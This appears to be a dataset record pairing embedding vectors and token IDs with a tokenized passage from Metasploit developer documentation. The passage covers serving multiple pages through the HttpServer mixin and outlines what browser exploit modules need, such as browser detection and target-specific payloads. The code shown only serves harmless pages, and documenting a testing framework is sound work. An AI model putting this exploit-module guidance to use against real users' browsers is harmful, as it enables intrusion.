0.270931214094162, -0.06260788440704346, 0.8186745643615723, -0.24664132297039032, 0.04359256476163864, -0.23982267081737518, -0.5993872284889221, -0.6617516279220581, 0.18195495009422302, -0.903130829334259, 0.4583210051059723, -0.49249592423439026, -0.8818265795707703, 0.08129550516605377, -0.14342206716537476, -0.0417005755007267, -0.0325150340795517, 0.7254366278648376, 0.4299846887588501, 0.8281781077384949, -0.3195258677005768, -0.0971762165427208, -0.007342092227190733, -0.02404356189072132, 0.7031134366989136, -0.07472425699234009, -0.3751739263534546, 0.6146588325500488, 0.3697451949119568, -0.8511735200881958, -0.7277036905288696, -1.1010301113128662, 0.2399166226387024, 0.5163661241531372, -0.5710832476615906, -0.6543564796447754, 0.044392481446266174, 0.14177042245864868, 0.6298107504844666, 0.5255895256996155, -0.3056989312171936, -0.13760869204998016, -0.744533896446228, 0.4203535318374634, -0.2830960750579834, 0.3666238486766815, 0.4410790503025055, -0.33865058422088623, -0.5041937232017517, -0.7226860523223877, 0.004713165108114481, 0.28630730509757996, 0.6083438396453857, 0.9124111533164978, -0.08163748681545258, 0.5633275508880615, 0.4702056646347046, -0.14431606233119965, 1.2323415279388428, 0.0828624963760376, 0.21413055062294006, 0.7995003461837769, -0.6341762542724609, -1.0427602529525757, -0.08197364211082458, 0.6140114665031433, -0.4629853665828705, 0.1758657693862915, -0.14804311096668243, -0.44067493081092834, -0.47587159276008606, 0.47958412766456604, -0.41030779480934143, -1.0609769821166992, -0.4282603859901428, -1.2678322792053223, -0.4629162847995758, 0.32279086112976074, 0.1778750717639923, 0.09289765357971191, -0.42942675948143005, -0.4211798906326294, -0.1442607343196869, -0.21680064499378204, 0.07874421030282974, 0.26608842611312866, -0.7521726489067078, -0.9162573218345642, 0.39203211665153503, -0.5281031131744385, -0.45540323853492737, -0.7419731020927429, -0.08196718990802765, -0.31701192259788513, -1.1414048671722412, -0.3352101743221283, -0.07354304939508438, -1.3016637563705444, 0.025951143354177475, -0.7304502129554749, 0.3635934889316559, 0.18536430597305298, -1.0537923574447632, 0.27085399627685547, 0.2636867165565491, -0.6824691891670227, 0.3769681453704834, -0.07487491518259048, -0.031151704490184784, 0.27240291237831116, -0.0387202650308609, 0.16422386467456818, 0.13965094089508057, 0.08141683787107468, -0.024179602041840553, -0.23879794776439667, -0.5885478854179382, 0.6025782227516174, 0.04092186689376831, -0.7868360280990601, 0.003204431151971221, -1.135931134223938, -0.29382050037384033, 0.4013441801071167, 0.6792982816696167, 0.7984077334403992, 1.0725651979446411, 0.3141208291053772, 0.2793710231781006, 0.17083734273910522, 0.4257569909095764, 0.6064302921295166, -0.3035472333431244, -0.40672361850738525, 0.6837700605392456, -0.0355263352394104, 0.19416970014572144, 0.0440797321498394, 0.28093084692955017, -0.3324630856513977, 0.03643941879272461, -0.041963983327150345, 0.01012902706861496, -0.740687906742096, -0.47628092765808105, -0.32266002893447876, 0.7918753027915955, -0.23796582221984863, -0.37745338678359985, 0.5957112312316895, 0.21212957799434662, -0.2925666570663452, 0.3952748477458954, -0.7131676077842712, -0.7031712532043457, 0.5130892992019653, -0.5803248286247253, -1.034983515739441, -0.7265443801879883, 0.16936369240283966, -0.08406870067119598, -0.5025122165679932, -0.5253615379333496, 0.3973053991794586, -0.8796422481536865, -0.10937648266553879, 0.7056962847709656, -0.3896763026714325, -0.24035602807998657, -0.6460753083229065, 0.37535151839256287, -0.1702841818332672, -1.0779207944869995, 0.039471667259931564, 1.3145784139633179, 0.6782839894294739, -0.5788224935531616, -0.1486307978630066, 0.38372302055358887, -0.4333001673221588, 0.17501266300678253, -0.05869337171316147, 0.17662233114242554, -0.7667561173439026, 0.09959303587675095, -0.6470120549201965, 0.377280056476593, -0.11622362583875656, 0.4803297221660614, -0.06987394392490387, -0.05379313603043556, 0.10093099623918533, 1.0076878070831299, -0.3176010549068451, -0.11407395452260971, 0.9218667149543762, 0.2748611271381378, 0.8456024527549744, -0.3878791630268097, 0.05109159275889397, -0.6657968759536743, 0.1305273026227951, 0.20853963494300842, 0.9236502051353455, 0.44686567783355713, -0.026539111509919167, 0.7897441983222961, -0.6994418501853943, -0.26411741971969604, 0.2604563236236572, 0.25559988617897034, -0.3226606547832489, 0.5260040760040283, -0.10261639952659607, 0.19026406109333038, -0.17504924535751343, 0.08735086023807526, 0.09638887643814087, -0.35847702622413635, 0.9803958535194397, -0.09910690039396286, -0.47306761145591736, 0.8134689331054688, -0.5589329600334167, 0.4867648780345917, 0.06486410647630692, -0.006716281641274691, 0.1867915242910385, -0.15028508007526398, -1.115814447402954, 0.5907038450241089, 0.8476222157478333, 0.2048642486333847, -0.3696288764476776, 0.2192770093679428, -0.6091507077217102, 0.21306948363780975, 0.36649197340011597, 0.39696604013442993, -1.2130659818649292, 0.10674557089805603, 0.3118600845336914, -0.1988813579082489, -1.0265625715255737, -0.2013828605413437, -0.24780359864234924, -0.0023263331968337297, 0.4192548394203186, -0.08606801182031631, 0.04529498144984245, -0.6005770564079285, 0.5379172563552856, 0.11060599237680435, 0.2542392611503601, 0.48206961154937744, -0.25680574774742126, -0.9852354526519775, 1.109065055847168, -0.27648380398750305, 0.3590008020401001, -0.28010544180870056, 1.0665982961654663, 0.13934877514839172, 0.007371265906840563, -0.5539699196815491, -0.37327319383621216, 0.03984583914279938, -0.3465646505355835, -0.22881744801998138, -0.021005259826779366, 0.16509543359279633, -0.4056486487388611, 0.7608321905136108, -0.6561214923858643, -0.280878484249115, -0.8618906736373901, 0.46845096349716187, -0.3995946943759918, -0.5022534728050232, 1.1050043106079102, -0.27943724393844604, -0.519987940788269, 0.2691688537597656, 0.3971810042858124, 0.057424094527959824, -0.0759526789188385, -0.46225929260253906, -0.45096075534820557, 0.3805738389492035, -0.4015183746814728, -0.4300507605075836, 0.24168528616428375, -0.15936985611915588, 0.15124177932739258, -0.1871379315853119, -0.5245003700256348, -0.3806086778640747, -0.10701310634613037, -0.40505102276802063, -0.5365570783615112, 0.7659324407577515, 0.2785996198654175, 0.5326931476593018, 0.6481387615203857, -0.039512597024440765, 0.16846077144145966, 0.21914678812026978, 0.4731033146381378, -0.14003533124923706, 0.6559778451919556, 0.6344723105430603, -0.28509849309921265, 0.31011906266212463, -0.22910310328006744, 0.851827085018158, -0.3165537416934967, -0.34670960903167725, -0.007016436662524939, -0.43915653228759766, -0.9124158024787903, -0.1839139312505722, -0.31651467084884644, -0.3371766209602356, 0.20702937245368958, -0.630327045917511, -0.7787863612174988, -0.22036698460578918, -0.6760720014572144, 0.11320553719997406, -0.2532730996608734, -0.1400832235813141, 0.20405986905097961, 0.1208512932062149, 0.8074218034744263, -1.1650062799453735, 4.020943641662598, -0.018545832484960556, 0.09613627195358276, -0.10911789536476135, 0.23039564490318298, 1.338158369064331, 1.0833817720413208, -0.07206990569829941, 0.4230857491493225, -0.663484513759613, -0.0627128928899765, -0.3206292390823364, 0.6675933599472046, 0.699693500995636, 0.2074825018644333, 0.5762538313865662, -0.2542467713356018, 0.09658017009496689, 0.22685246169567108, -0.7894095182418823, -0.7581544518470764, -0.0006314787897281349, -0.6381195187568665, 1.2389017343521118, 0.1960507333278656, -0.04819506034255028, 0.29297924041748047, -1.0647022724151611, 0.6820896863937378, -0.5985971689224243, 0.41655173897743225, -0.23734977841377258, 0.13153856992721558, -0.11353032290935516, -0.5460613369941711, 0.3047245442867279, 0.003608536208048463, -0.6998847126960754, -0.8763411045074463, -0.47674405574798584, 1.1880955696105957, -0.4021233916282654, 0.18669013679027557, -0.5059558749198914, 0.28672927618026733, 0.6863322257995605, -0.11798583716154099, -0.3819837272167206, 0.5232067704200745, -0.2971173822879791, 0.4980437457561493, -0.36669299006462097, 0.3609101474285126, 0.5332618355751038, -0.6342244744300842, 0.191894993185997, 0.927019476890564, -0.8872735500335693, -0.3979027271270752, 0.16313256323337555, 0.278751015663147, -0.16711418330669403, 0.2501566708087921, -0.10641082376241684, -0.6455788612365723, -0.136723592877388, -0.533924400806427, 0.6859874725341797, 0.34362950921058655, 0.09258504956960678, -0.29165780544281006, -0.34891271591186523, -0.056757811456918716, -1.025390386581421, 0.8133781552314758, 0.06143869459629059, 0.20540077984333038, 0.4614502787590027, 0.30166715383529663, -0.8376649618148804, 0.11242769658565521, -0.29259979724884033, -0.8772149682044983, 0.7186851501464844, 0.5053137540817261, 0.3343803584575653, 0.013431698083877563, -0.9360514283180237, 0.16460290551185608, 0.6182813048362732, 0.773193895816803, 0.3004918694496155, -0.1991138905286789, 0.7487150430679321, 0.5490108728408813 ]
[ 101, 1996, 18804, 13102, 4135, 4183, 7705, 3640, 2367, 4666, 7076, 2017, 2064, 2224, 2000, 4503, 1037, 16602, 18077, 1010, 3701, 2027, 2024, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 16770, 2121, 6299, 1010, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 16770, 2121, 6299, 1024, 1024, 16129, 1998, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 16602, 10288, 24759, 28100, 8043, 6299, 1012, 2023, 4339, 6279, 4472, 1996, 16770, 2121, 6299, 4666, 2378, 1012, 1996, 16770, 2121, 6299, 4666, 2378, 2003, 2785, 1997, 1996, 2388, 1997, 2035, 8299, 8241, 4666, 7076, 1006, 2066, 16602, 10288, 24759, 28100, 8043, 6299, 1998, 16770, 2121, 6299, 1024, 1024, 16129, 1007, 1012, 2000, 2224, 2009, 1010, 2115, 11336, 2003, 3223, 2000, 2031, 1037, 1523, 2006, 1035, 5227, 1035, 24471, 2072, 1524, 4118, 1010, 2029, 2003, 1037, 2655, 5963, 13330, 2043, 1996, 8299, 8241, 8267, 1037, 8299, 5227, 2013, 1996, 16602, 1012, 2019, 2742, 1997, 4292, 2039, 1523, 2006, 1035, 5227, 1035, 24471, 2072, 1524, 1024, 1001, 1001, 4952, 2015, 2005, 1037, 8299, 5227, 1012, 1001, 18856, 2072, 2003, 1996, 22278, 4874, 1010, 1998, 5227, 2003, 1037, 10151, 1024, 1024, 15053, 1024, 1024, 8299, 1024, 1024, 5227, 4874, 1001, 13366, 2006, 1035, 5227, 1035, 24471, 2072, 1006, 18856, 2072, 1010, 5227, 1007, 6140, 1035, 3570, 1006, 1000, 7396, 11186, 24471, 2072, 1024, 1001, 1063, 5227, 1012, 24471, 2072, 1065, 1000, 1007, 2203, 1996, 1523, 2006, 1035, 5227, 1035, 24471, 2072, 1524, 4118, 2003, 2036, 2073, 2017, 2064, 3443, 1996, 8299, 3433, 1012, 2182, 1521, 1055, 1037, 3232, 1997, 9804, 2017, 2064, 2224, 2000, 2079, 2008, 1024, 4604, 1035, 2025, 1035, 2179, 1006, 18856, 2072, 1007, 1011, 10255, 1037, 24837, 2000, 1996, 7396, 1012, 2191, 2469, 2000, 3413, 1996, 18856, 2072, 1006, 22278, 1007, 4874, 1012, 4604, 1035, 2417, 7442, 6593, 1006, 18856, 2072, 1010, 3295, 1027, 1521, 1013, 1521, 1010, 2303, 1027, 1521, 1521, 1010, 20346, 2015, 1027, 1063, 1065, 1007, 1011, 2417, 7442, 16649, 1996, 7396, 2000, 1037, 2047, 3295, 1012, 4604, 1035, 3433, 1006, 18856, 2072, 1010, 2303, 1010, 20346, 2015, 1027, 1063, 1065, 1007, 1011, 10255, 1037, 3433, 2000, 1996, 7396, 1012, 2023, 4118, 2003, 2763, 2054, 2017, 1521, 2222, 2022, 2478, 2087, 1997, 1996, 2051, 1012, 2065, 2017, 1521, 2310, 2464, 2070, 1997, 2256, 18077, 14184, 1010, 2017, 2097, 2036, 2156, 2068, 2478, 18077, 1024, 1024, 6556, 1024, 1024, 16770, 2121, 6299, 1024, 1024, 16129, 2612, 1997, 18077, 1024, 1024, 6556, 1024, 1024, 16770, 2121, 6299, 1012, 8192, 2003, 3262, 1996, 2168, 1010, 1996, 4489, 2003, 1996, 18077, 1024, 1024, 6556, 1024, 1024, 16770, 2121, 6299, 1024, 1024, 16129, 4666, 2378, 3957, 2017, 3229, 2000, 2070, 9262, 22483, 4972, 2066, 2918, 21084, 1010, 16721, 29035, 1010, 9808, 10788, 1010, 4385, 1012, 2182, 1521, 1055, 2019, 2742, 1997, 6016, 1037, 8299, 3433, 1024, 1001, 1001, 10255, 1037, 1000, 7592, 1010, 2088, 999, 1000, 2000, 1996, 7396, 1001, 13366, 2006, 1035, 5227, 1035, 24471, 2072, 1006, 18856, 2072, 1010, 5227, 1007, 16129, 1027, 1000, 7592, 1010, 2088, 999, 1000, 4604, 1035, 3433, 1006, 18856, 2072, 1010, 16129 ]
metasploit
110.txt
0
) end also note that in order to handle a http request, it must contain the base uripath, which by default is random. this means if you want to handle multiple uris ( possible if you need to handle a redirect or a link ), you also need to make sure they have the base uripath. to retrieve the base uripath, you can use the β€œ get _ resource ” method, here ’ s an example : def serve _ page _ 1 ( cli ) html = " this is page 1 " send _ response ( cli, html ) end def serve _ page _ 2 ( cli ) html = " this is page 2 " send _ response ( cli, html ) end def serve _ default _ page ( cli ) html = % q | < html > < a href = " # { get _ resource. chomp ('/') } / page _ 1. html " > go to page 1 < / a > < br > < a href = " # { get _ resource. chomp ('/') } / page _ 2. html " > go to page 2 < / a > < / html > | send _ response ( cli, html ) end def on _ request _ uri ( cli, request ) case request. uri when / page _ 1 \. html $ / serve _ page _ 1 ( cli ) when / page _ 2 \. html $ / serve _ page _ 2 ( cli ) else serve _ default _ page ( cli ) end end of course, when you write a metasploit browser exploit there ’ s a lot more you need to think about. for example, your module probably needs to do browser detection, because it wouldn ’ t make any sense to allow chrome to receive an ie exploit, would it? you probably also need to build a payload that ’ s specific to the target, which means your module needs to know what target it ’ s hitting, and you have to build a method to customize the exploit accordingly, etc. the httpserver and httpserver : : html mixin provides all kinds of methods to allow you to accomplish all these. make sure to check out the api documentation ( you can either do this by running msf / documentation / gendocs. sh, or just run β€œ yard ” in the msf directory ), or checkout existing code examples ( especially the recent ones ). to get things started,
[ 0.3689574599266052, -0.5253528952598572, -0.19115930795669556, 0.34796684980392456, -0.4462822675704956, -0.2631596028804779, -0.8633856177330017, 0.13436321914196014, 0.7663854360580444, 1.5059722661972046, 0.0209026001393795, -0.20413555204868317, 0.4073624014854431, -0.6507652401924133, -0.21916590631008148, -0.270007461309433, -0.7786127328872681, -0.37107178568840027, -1.4917970895767212, 0.1652502715587616, 0.1039569303393364, 0.14064067602157593, -0.5074520707130432, -0.642760694026947, 0.01584099791944027, 0.2739357650279999, 0.8335705399513245, 0.4816814363002777, 0.4304114878177643, 0.5848327875137329, 0.8557670712471008, 0.06668385863304138, -0.2810913920402527, -0.5608901977539062, 0.1821717917919159, 0.02888626977801323, 0.7301187515258789, -0.4435187876224518, 0.15926261246204376, -0.6345220804214478, 0.2003292292356491, -0.7664715647697449, 0.04735260829329491, -0.5074173808097839, 0.003934139385819435, -0.15777362883090973, 0.5645093321800232, -0.1011107936501503, 0.43693453073501587, -0.3117629587650299, 0.5672627687454224, 0.47210201621055603, 0.25582370162010193, 0.4687541723251343, -0.00897902250289917, -0.1719498336315155, -0.1629449874162674, 0.4577651917934418, -0.2847263813018799, 0.2980217933654785, -0.14630332589149475, 0.6767023801803589, -0.05025305226445198, -1.0668857097625732, 0.12798818945884705, 1.4631519317626953, 0.19946114718914032, -0.12392114847898483, -0.26500868797302246, -0.059548355638980865, -0.5446183085441589, 0.75372314453125, -0.6091784834861755, -0.5020782351493835, -0.28262147307395935, 0.2342734932899475, 0.8326824903488159, -0.0765821784734726, -0.1756046563386917, 0.7285956144332886, -0.057278893887996674, 0.7593139410018921, 0.06301143765449524, -0.01924603059887886, -0.25609979033470154, -0.32336583733558655, 0.12657806277275085, 0.6607775688171387, -0.5078056454658508, 0.15568788349628448, 0.8247447609901428, 0.30817750096321106, -0.5225649476051331, -0.1458769291639328, 0.36088407039642334, 1.0289117097854614, -0.3143240809440613, 0.5067590475082397, 0.25714564323425293, -0.5547252297401428, 1.1158084869384766, 1.0340431928634644, -0.04245254769921303, 0.30672216415405273, -0.33004996180534363, 0.6534421443939209, 0.411568820476532, -0.13344766199588776, -0.3111558258533478, -0.3653993010520935, 0.511504590511322, -0.0568002425134182, -0.14186392724514008, -0.3220478296279907, -0.07840102165937424, 0.7261356115341187, 0.5819696187973022, -0.015774022787809372, -0.08654415607452393, 0.5904515981674194, -0.44693323969841003, -0.4006665050983429, -0.09454771131277084, 0.2938668429851532, 0.4747261703014374, -0.5579994320869446, -0.05864532291889191, 0.892685055732727, -0.6361409425735474, -0.28007471561431885, -0.409965842962265, 0.16158078610897064, 0.3686453700065613, 0.5717800259590149, -0.4881209135055542, 0.06874789297580719, 0.09846652299165726, 0.03209986165165901, 0.539080798625946, -1.1074799299240112, 0.2997890114784241, -0.20827794075012207, 0.07083788514137268, 1.388799786567688, 0.6160783767700195, -0.5825571417808533, -0.671786904335022, 0.14703203737735748, -0.33154264092445374, 0.5146307349205017, -0.5448267459869385, -0.6911379098892212, 0.8383188843727112, -0.1548120379447937, 0.0557570718228817, 0.8135823011398315, -0.19659923017024994, 0.5543712377548218, -0.3313802480697632, 0.03529604151844978, 0.5531007647514343, 0.9390148520469666, 0.09678418934345245, 0.555057942867279, -0.3085598051548004, 0.2927504777908325, -0.9066637754440308, -0.8306021690368652, -0.3185504674911499, -0.06498461961746216, 0.11139442771673203, -0.29039081931114197, 0.027061060070991516, 0.14004960656166077, 1.7468491792678833, 1.0018140077590942, -0.3151872158050537, -0.03219345584511757, 0.10100194066762924, 0.3065381944179535, -0.49294278025627136, 0.15664902329444885, 0.36083564162254333, 0.8370407223701477, -0.16883330047130585, 0.13539300858974457, 0.1469445675611496, -0.8662720322608948, -0.10498784482479095, -0.21849563717842102, -0.4181632399559021, 0.8141447901725769, -0.056393884122371674, 0.25134921073913574, 0.7273337841033936, 0.03595713898539543, -1.3375903367996216, 0.1192697286605835, -0.5288504958152771, -1.6847894191741943, -0.3484308123588562, -0.0056664831936359406, 0.3000040352344513, 0.1567351371049881, -0.10433368384838104, -0.2419765740633011, 0.4503844082355499, 0.6596784591674805, -0.5138256549835205, 0.5504210591316223, 0.7211800217628479, 0.13613483309745789, -0.4868093430995941, 0.4522334337234497, -0.3074004650115967, 0.13739511370658875, -0.5544620156288147, 0.37650951743125916, -0.25118157267570496, 0.1971745789051056, 0.44529977440834045, 0.3880087733268738, 0.46694445610046387, -0.21848155558109283, -0.32418686151504517, -0.3601813018321991, -0.013010930269956589, 0.42302677035331726, -0.4940136671066284, 0.10757269710302353, -0.12626221776008606, 0.5906198024749756, 0.23239682614803314, 0.7654581069946289, 0.3070560395717621, -0.5345904231071472, 0.613982081413269, 0.3724319040775299, -0.09848978370428085, 0.041774701327085495, 0.12425442039966583, 1.0710200071334839, 0.17034997045993805, 0.4364897608757019, 0.7604508399963379, 0.3943774104118347, 0.21844211220741272, -0.274578332901001, -0.3335801959037781, 0.5922887921333313, -0.384835809469223, 1.1115360260009766, 0.47339874505996704, -0.4767886698246002, -0.3824347257614136, -0.9906640648841858, 0.4179844558238983, 1.0605300664901733, -1.0849950313568115, -1.443861722946167, 0.20092640817165375, -0.008052879013121128, -0.7120009064674377, -0.7359436750411987, -0.021205205470323563, 1.087369441986084, -0.6210830807685852, -0.003723942209035158, -0.2888375222682953, -0.7633772492408752, -1.08029305934906, -0.1859094500541687, -1.1773964166641235, -0.5734115839004517, -0.4826549291610718, -0.08207692950963974, -0.19556762278079987, -0.09219322353601456, -0.02704050950706005, -0.2876020073890686, -0.7240540981292725, 0.23367397487163544, 0.7596809267997742, 0.45283955335617065, 0.34598758816719055, -0.35111483931541443, -0.8827348947525024, 0.4959087073802948, -0.19139453768730164, 1.2664469480514526, -0.677244246006012, -0.5211446285247803, -0.48173099756240845, -0.3567996621131897, -0.24942800402641296, 0.16968967020511627, 1.167831301689148, 0.4907372295856476, -0.06956972926855087, 0.23251868784427643, -0.10592018067836761, 0.12221380323171616, 0.36390262842178345, 0.21436335146427155, -0.06192267686128616, 0.818565309047699, -0.22015829384326935, -0.005381616298109293, 0.7124610543251038, 0.10472040623426437, -0.86623615026474, 0.565119206905365, -0.6067821383476257, 0.7219260334968567, -0.3726983964443207, 0.6220971345901489, 0.3466705083847046, -0.017476830631494522, 0.24776756763458252, -0.2791646718978882, 0.3688466548919678, -0.30658042430877686, 0.10368175059556961, -0.006877337582409382, -0.1872289478778839, 0.4170851707458496, 0.2529190182685852, -0.8636894822120667, 0.8847054243087769, -0.32013627886772156, 0.006007220596075058, 0.23737214505672455, -0.09947050362825394, 0.7540041208267212, 0.23027947545051575, -0.010961000807583332, -0.2589506506919861, -0.9669407606124878, -0.45403048396110535, 0.15399734675884247, 0.20799103379249573, -0.5432966351509094, 0.4580356180667877, 0.3145257234573364, 0.05600803717970848, 0.7413378953933716, 0.870743989944458, -0.5385569930076599, -0.21225866675376892, -0.19417187571525574, -0.7042326927185059, 0.1979256123304367, 0.5122422575950623, 0.32083842158317566, 0.36440882086753845, 0.5131879448890686, -0.7488863468170166, -0.5726116299629211, 0.025983773171901703, -0.29311424493789673, -0.12384364008903503, 0.39053720235824585, -0.21613973379135132, -0.11573280394077301, -0.8472028970718384, -0.28048616647720337, 0.12050560861825943, 0.13511821627616882, 0.5510942935943604, -0.030595233663916588, 1.1102131605148315, -0.2377757579088211, 0.2489013373851776, 0.3043966591358185, 0.01765889674425125, -0.3860572874546051, 0.26091107726097107, -0.04328020289540291, 0.521287739276886, -0.49034181237220764, -0.07764188945293427, 0.1846560388803482, 0.14170943200588226, 0.542317807674408, 0.2574676275253296, 0.19999530911445618, -0.4761563241481781, -0.44903919100761414, -0.3871040642261505, -0.8175697922706604, 0.05981788411736488, -0.16568447649478912, 0.5224814414978027, -0.8370862007141113, -0.5935283303260803, -0.7066105008125305, 0.45753100514411926, 1.4454842805862427, 1.2755147218704224, 0.46191397309303284, 0.22624795138835907, 0.012893211096525192, -0.5870493054389954, 0.7131103277206421, -0.05240380018949509, 0.5200860500335693, -0.11733857542276382, 1.283135175704956, 0.015611602924764156, 0.5153249502182007, -0.42926889657974243, -0.20881082117557526, 0.11930262297391891, -0.4306580126285553, -0.23784857988357544, 0.18043622374534607, -0.6010324358940125, -0.01965990476310253, -0.05204816162586212, -0.03757401555776596, -0.8298184275627136, -0.8709666132926941, 0.03561271354556084, 0.8694232702255249, 0.32872068881988525, -0.6539788842201233, -0.769476056098938, -0.4924370050430298, -0.31813952326774597, 0.2067539095878601, 0.30040785670280457, -0.5633449554443359, -0.25685012340545654, -0.43658995628356934, -0.8649212718009949, -0.16143658757209778, 1.1343369483947754, 0.3179991543292999, 0.0769190639257431, -0.8027935028076172, -0.36016616225242615, 0.13561944663524628, -0.3033750355243683, -0.33963096141815186, -0.4270077049732208, 0.05940565466880798, 0.03289462625980377, 0.21989114582538605, -0.9288739562034607, -0.4141513407230377, -0.2832229435443878, -0.6427006125450134, 0.3020980954170227, -0.909171462059021, 0.26857686042785645, -0.09810405224561691, -0.3328559398651123, -0.07114182412624359, 0.4019731283187866, -0.3546767830848694, -0.08163601905107498, -0.5438024401664734, 0.5163238048553467, -0.2765803039073944, 0.24151475727558136, 0.30973732471466064, -0.1589137464761734, -0.23972007632255554, 0.4291244149208069, 0.10627704858779907, -0.439888596534729, 0.05550433695316315, -0.38104820251464844, -0.6968479752540588, 0.312703013420105, -0.5495200157165527, 0.616836428642273, 0.5280323028564453, 0.38769739866256714, 0.14606665074825287, -0.30170437693595886, 1.3190819025039673, 0.5375175476074219, 0.17962540686130524, -0.8121886253356934, -0.16126595437526703, 0.03196711465716362, 0.38243138790130615, 0.15206988155841827, 0.11972916126251221, -0.1992393136024475, -0.26180702447891235, -0.21492339670658112, 0.004268484655767679, -0.03328326717019081, -0.7849645614624023, 0.004828514996916056, -0.39163047075271606, -0.3485162556171417, 0.2959928512573242, 0.6718989610671997, 0.13327540457248688, -0.6429390907287598, -0.09513743221759796, -0.9246889352798462, 0.13572828471660614, -0.9299346804618835, 0.4141104519367218, -0.9977045059204102, -0.17171703279018402, -0.43424859642982483, 0.21842512488365173, 0.06734571605920792, -0.09179963916540146, 0.528523862361908, 0.6721156239509583, 0.8308017253875732, -0.3023698627948761, -0.4573468863964081, 0.2661173343658447, -0.20468419790267944, -0.4867427349090576, 0.18329614400863647, 0.11716776341199875, 0.12834703922271729, -0.008872897364199162, 0.4568665325641632, -0.5428912043571472, -0.7695289850234985, -0.5901522040367126, -0.3258524537086487, -0.6101629734039307, -0.29825782775878906, -0.7703719139099121, -0.8155755400657654, -0.14707204699516296, 0.053455110639333725, -0.23404842615127563, -1.6235482692718506, 0.5005531907081604, -0.4123011827468872, 0.39018693566322327, 0.08177696168422699, 0.19531413912773132, -0.31889328360557556, -0.1587858498096466, 0.01455328706651926, 0.9421268105506897, -0.12364722043275833, 0.11142590641975403, -0.058874890208244324, 0.37413451075553894, 0.14611080288887024, 0.20938102900981903, -0.47007590532302856, -0.4949198067188263, -0.5663390755653381, -0.0852256491780281, -0.1573362797498703, 0.8395584225654602, -0.08615726232528687, -0.014145716093480587, -0.2621653974056244, 0.24463656544685364, -0.027283603325486183, 0.06330318748950958, -0.3305954039096832, 0.6437406539916992, 0.6275132298469543, -0.2319580465555191, 0.38002535700798035, -0.2267087697982788, 0.8057172298431396, 0.7638532519340515, -0.27733445167541504, -0.6082981824874878, 0.3241018056869507, -0.4133146107196808, -1.3500016927719116, 0.8223608136177063, -0.0648832693696022, -0.16565527021884918, -0.15044941008090973, -0.6066545844078064, 0.1374455988407135, -0.5347771644592285, 0.2972753643989563, 0.897363543510437, 0.5855436325073242, 0.666827380657196, -0.639384925365448, 0.5352007150650024, 0.837045431137085, -0.262991726398468, 0.8104034662246704, -0.518464982509613, -0.002721907803788781, -0.6149932742118835, -0.271234393119812, -0.29628419876098633, -1.1641312837600708, -0.19583731889724731, 0.6507115364074707, -0.0808357298374176, 0.3004070818424225, -0.030546044930815697, -0.9836558699607849, -0.06159743666648865, 0.029874557629227638, -0.17490708827972412, -0.3127198815345764, 0.4326317608356476, 0.4779469072818756, 0.2928502559661865, 0.06552720069885254, 0.10756511986255646, -0.2706336975097656, 0.08320457488298416, 1.0407370328903198, 0.4848085939884186, -0.7475837469100952, 1.1018322706222534, 0.24131764471530914, -0.9242575764656067, -0.45487678050994873, -1.1735589504241943, -0.012929256074130535, -0.10586835443973541, -0.5255687832832336, -0.5381801724433899, 0.09280431270599365, -0.03891312703490257, 0.06637446582317352, 0.6926794052124023, -0.4314846098423004, -0.1908426284790039, -0.1034199446439743, 0.17532122135162354, 0.40277063846588135, 0.8934167623519897, 0.6686854362487793, -0.38924816250801086, -0.8653823733329773, -0.8748006820678711, -0.509151816368103, 0.5711879134178162, 0.6118286848068237, 1.1044604778289795, -0.4156320095062256, 0.2690781056880951, -0.1791388839483261, -0.020643599331378937, 0.04737747460603714, 0.06976628303527832, 0.3824072778224945, 0.90994793176651, -0.43934017419815063, -1.3452508449554443, -0.4661780595779419, 0.17697349190711975, -0.0008572047227062285, 0.11575841903686523, 0.04380134120583534, -0.2228953093290329, -0.5505065321922302, -0.2452649027109146, -0.6896042823791504, -1.3932477235794067, -0.27898910641670227, -1.2671265602111816, -0.37387022376060486, 0.12908272445201874, 0.019413864240050316, -0.025841476395726204, -0.2584640383720398, -0.7426707148551941, 0.06664682924747467, -0.5247380137443542, -0.03965475410223007, 0.3379742503166199, -0.29358038306236267, -0.54935622215271, 0.487551212310791, -1.1595386266708374, -0.2547754943370819, -0.0696633905172348, 0.15423576533794403, -0.2899148762226105, -0.44765913486480713, -0.3355928063392639, -0.056358300149440765, -1.0740690231323242, 0.7995182871818542, -0.6047705411911011, 0.12282087653875351, -0.12691475450992584, -0.7505270838737488, 0.34814387559890747, 0.3341570794582367, -0.45202162861824036, 0.6030185222625732, -0.1605311632156372, -0.0790545642375946, 0.05158426985144615, -0.4207816421985626, 0.4717809557914734, -0.14157935976982117, 0.5044024586677551, 0.3376033306121826, 0.0009934700792655349, -0.7067452073097229, -0.07021317631006241, -0.2360999584197998, -0.916206419467926, -0.5286938548088074, -0.6901813745498657, 0.1564403474330902, -0.07400757074356079, 0.35822901129722595, 0.4687366783618927, 1.13739812374115, 0.4847462475299835, 0.2928656041622162, -0.4752790927886963, 0.9126085638999939, 0.5304103493690491, 0.2713801860809326, -0.3643896281719208, 0.6105971336364746, -0.2331719845533371, -0.10076703876256943, 0.23520614206790924, 0.37808823585510254, -0.38937655091285706, 0.08634597808122635, -0.46257728338241577, -0.39524364471435547, -0.3499070703983307, 0.1849355697631836, -0.4785112738609314, 0.19784976541996002, 0.49022310972213745, -0.012402892112731934, 0.17899133265018463, 0.01831330917775631, -0.4147804081439972, 0.0019458268070593476, -1.047486424446106, -0.23199303448200226, -0.2807852625846863, -0.3284682631492615, -0.2632867693901062, -0.4664594531059265, -0.46504801511764526, -0.15915869176387787, -0.4314281940460205, 0.24401094019412994, 0.460653156042099, -0.6585785746574402, 0.3998098075389862, 0.9711779952049255, -0.8116542100906372, -0.7193868160247803, -0.34142303466796875, 0.11444373428821564, -0.21956627070903778, -1.2137869596481323, 0.22982968389987946, 0.2896645963191986, 0.3185841739177704, -0.03003372624516487, -0.16541950404644012, 0.3190057873725891, 0.4133186638355255, 0.12006562948226929, -0.014430118724703789, 0.51251220703125, -0.7591317296028137, 0.29673248529434204, -0.3997955918312073, -0.3483045697212219, 0.24187323451042175, -0.3959309458732605, 0.40868180990219116, 0.17626452445983887, -0.15613454580307007, 0.7487179636955261, 0.06184875965118408, 0.7208062410354614, 0.7564979195594788, 0.5519092082977295, 0.5055104494094849, -0.15323925018310547, 0.0021557314321398735, -0.5343194603919983, 0.2588110566139221, 0.2531376779079437, 0.9981946349143982, 0.2983071208000183, 0.1268002837896347, 0.7301602959632874, -0.6847354769706726, 